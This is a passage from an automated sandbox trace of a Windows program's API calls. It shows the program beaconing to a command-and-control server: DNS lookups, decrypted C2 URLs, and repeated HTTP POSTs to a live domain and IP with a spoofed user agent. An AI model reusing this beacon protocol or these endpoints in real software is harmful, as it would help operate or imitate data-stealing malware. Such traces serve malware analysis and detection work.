(pAddrInfo=0x5ce060*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0212.203] GetProcessHeap () returned 0x5b0000 [0212.203] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5dd8 [0212.203] GetProcessHeap () returned 0x5b0000 [0212.203] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0212.204] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0212.205] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0212.205] GetProcessHeap () returned 0x5b0000 [0212.205] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0212.205] GetProcessHeap () returned 0x5b0000 [0212.205] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0212.205] GetProcessHeap () returned 0x5b0000 [0212.205] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3038 [0212.205] GetProcessHeap () returned 0x5b0000 [0212.205] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0212.206] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0212.207] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0212.207] GetProcessHeap () returned 0x5b0000 [0212.207] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0212.207] GetProcessHeap () returned 0x5b0000 [0212.208] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0212.208] send (s=0x324, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0212.208] send (s=0x324, buf=0x5d1e18*, len=159, flags=0) returned 159 [0212.208] GetProcessHeap () returned 0x5b0000 [0212.209] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0212.209] recv (in: s=0x324, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0213.853] GetProcessHeap () returned 0x5b0000 [0213.853] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0213.854] GetProcessHeap () returned 0x5b0000 [0213.854] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3038 | out: hHeap=0x5b0000) returned 1 [0213.854] GetProcessHeap () returned 0x5b0000 [0213.854] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0213.854] GetProcessHeap () returned 0x5b0000 [0213.855] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5dd8 | out: hHeap=0x5b0000) returned 1 [0213.855] closesocket (s=0x324) returned 0 [0213.856] GetProcessHeap () returned 0x5b0000 [0213.856] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9d0 | out: hHeap=0x5b0000) returned 1 [0213.856] GetProcessHeap () returned 0x5b0000 [0213.856] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d4e48 | out: hHeap=0x5b0000) returned 1 [0213.857] GetProcessHeap () returned 0x5b0000 [0213.857] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0213.857] GetProcessHeap () returned 0x5b0000 [0213.857] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0213.876] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x1280) returned 0x324 [0213.877] Sleep (dwMilliseconds=0xea60) [0213.892] GetProcessHeap () returned 0x5b0000 [0213.892] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3080 [0213.893] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0213.893] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0213.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0213.942] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0213.991] GetProcessHeap () returned 0x5b0000 [0213.992] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0213.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0213.993] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0213.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0213.994] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0213.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0213.994] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0213.994] GetProcessHeap () returned 0x5b0000 [0213.995] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0213.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0213.996] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3080, pdwDataLen=0xdfcfc | out: pbData=0x5d3080, pdwDataLen=0xdfcfc) returned 1 [0213.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0213.997] CryptDestroyKey (hKey=0x5be288) returned 1 [0213.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0213.998] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0213.998] GetProcessHeap () returned 0x5b0000 [0213.998] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0213.998] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0213.999] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0214.063] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0214.064] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0214.064] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0214.065] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0214.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0214.066] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0214.066] GetProcessHeap () returned 0x5b0000 [0214.066] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0214.066] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0214.066] GetProcessHeap () returned 0x5b0000 [0214.067] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0214.067] GetProcessHeap () returned 0x5b0000 [0214.067] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0214.067] GetProcessHeap () returned 0x5b0000 [0214.068] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3080 | out: hHeap=0x5b0000) returned 1 [0214.068] GetProcessHeap () returned 0x5b0000 [0214.068] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e88 [0214.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0214.069] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0214.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0214.078] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0214.086] GetProcessHeap () returned 0x5b0000 [0214.086] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0214.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0214.087] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0214.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0214.088] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0214.089] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0214.089] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0214.089] GetProcessHeap () returned 0x5b0000 [0214.089] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0214.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0214.090] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e88, pdwDataLen=0xdfcfc | out: pbData=0x5d2e88, pdwDataLen=0xdfcfc) returned 1 [0214.091] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0214.091] CryptDestroyKey (hKey=0x5be288) returned 1 [0214.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0214.092] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0214.096] GetProcessHeap () returned 0x5b0000 [0214.096] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5d60 [0214.097] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0214.097] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0214.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0214.098] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0214.099] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0214.099] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0214.099] GetProcessHeap () returned 0x5b0000 [0214.099] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0214.100] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdf20*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0214.143] GetProcessHeap () returned 0x5b0000 [0214.143] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca900 [0214.143] socket (af=2, type=1, protocol=6) returned 0x328 [0214.143] connect (s=0x328, name=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0214.234] FreeAddrInfoW (pAddrInfo=0x5cdf20*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0214.234] GetProcessHeap () returned 0x5b0000 [0214.234] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5888 [0214.234] GetProcessHeap () returned 0x5b0000 [0214.234] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0214.235] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0214.236] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0214.236] GetProcessHeap () returned 0x5b0000 [0214.236] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0214.236] GetProcessHeap () returned 0x5b0000 [0214.236] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0214.236] GetProcessHeap () returned 0x5b0000 [0214.236] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3398 [0214.236] GetProcessHeap () returned 0x5b0000 [0214.236] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0214.237] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0214.238] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0214.238] GetProcessHeap () returned 0x5b0000 [0214.238] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0214.238] GetProcessHeap () returned 0x5b0000 [0214.238] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0214.238] send (s=0x328, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0214.240] send (s=0x328, buf=0x5d1e18*, len=159, flags=0) returned 159 [0214.240] GetProcessHeap () returned 0x5b0000 [0214.240] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0214.240] recv (in: s=0x328, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0215.458] GetProcessHeap () returned 0x5b0000 [0215.459] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0215.459] GetProcessHeap () returned 0x5b0000 [0215.459] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3398 | out: hHeap=0x5b0000) returned 1 [0215.459] GetProcessHeap () returned 0x5b0000 [0215.459] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0215.460] GetProcessHeap () returned 0x5b0000 [0215.460] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5888 | out: hHeap=0x5b0000) returned 1 [0215.460] closesocket (s=0x328) returned 0 [0215.460] GetProcessHeap () returned 0x5b0000 [0215.460] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca900 | out: hHeap=0x5b0000) returned 1 [0215.461] GetProcessHeap () returned 0x5b0000 [0215.461] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5d60 | out: hHeap=0x5b0000) returned 1 [0215.461] GetProcessHeap () returned 0x5b0000 [0215.461] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e88 | out: hHeap=0x5b0000) returned 1 [0215.461] GetProcessHeap () returned 0x5b0000 [0215.461] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0215.462] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x127c) returned 0x328 [0215.463] Sleep (dwMilliseconds=0xea60) [0215.469] GetProcessHeap () returned 0x5b0000 [0215.469] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3620 [0215.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0215.470] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0215.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0215.478] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0215.507] GetProcessHeap () returned 0x5b0000 [0215.507] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0215.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0215.509] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0215.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0215.510] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0215.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0215.510] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.511] GetProcessHeap () returned 0x5b0000 [0215.511] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0215.512] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0215.512] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3620, pdwDataLen=0xdfcfc | out: pbData=0x5d3620, pdwDataLen=0xdfcfc) returned 1 [0215.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0215.532] CryptDestroyKey (hKey=0x5bde08) returned 1 [0215.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0215.533] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0215.533] GetProcessHeap () returned 0x5b0000 [0215.533] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0215.534] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0215.534] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0215.535] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0215.535] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0215.536] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0215.536] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0215.537] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0215.537] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0215.537] GetProcessHeap () returned 0x5b0000 [0215.537] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0215.537] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0215.538] GetProcessHeap () returned 0x5b0000 [0215.538] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0215.538] GetProcessHeap () returned 0x5b0000 [0215.538] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0215.538] GetProcessHeap () returned 0x5b0000 [0215.538] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3620 | out: hHeap=0x5b0000) returned 1 [0215.538] GetProcessHeap () returned 0x5b0000 [0215.538] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d32c0 [0215.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0215.539] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0215.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0215.545] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0215.554] GetProcessHeap () returned 0x5b0000 [0215.554] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0215.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0215.555] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0215.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0215.556] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0215.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0215.557] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.557] GetProcessHeap () returned 0x5b0000 [0215.557] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0215.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0215.558] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d32c0, pdwDataLen=0xdfcfc | out: pbData=0x5d32c0, pdwDataLen=0xdfcfc) returned 1 [0215.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0215.559] CryptDestroyKey (hKey=0x5be048) returned 1 [0215.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0215.560] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0215.560] GetProcessHeap () returned 0x5b0000 [0215.560] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5b38 [0215.560] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0215.561] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0215.564] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0215.564] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0215.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0215.565] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0215.565] GetProcessHeap () returned 0x5b0000 [0215.565] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0215.565] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cda98*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf3c8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0215.567] GetProcessHeap () returned 0x5b0000 [0215.567] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8d0 [0215.567] socket (af=2, type=1, protocol=6) returned 0x32c [0215.567] connect (s=0x32c, name=0x5cf3c8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0215.643] FreeAddrInfoW (pAddrInfo=0x5cda98*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf3c8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0215.643] GetProcessHeap () returned 0x5b0000 [0215.643] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5dd8 [0215.643] GetProcessHeap () returned 0x5b0000 [0215.643] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0215.643] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0215.644] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: 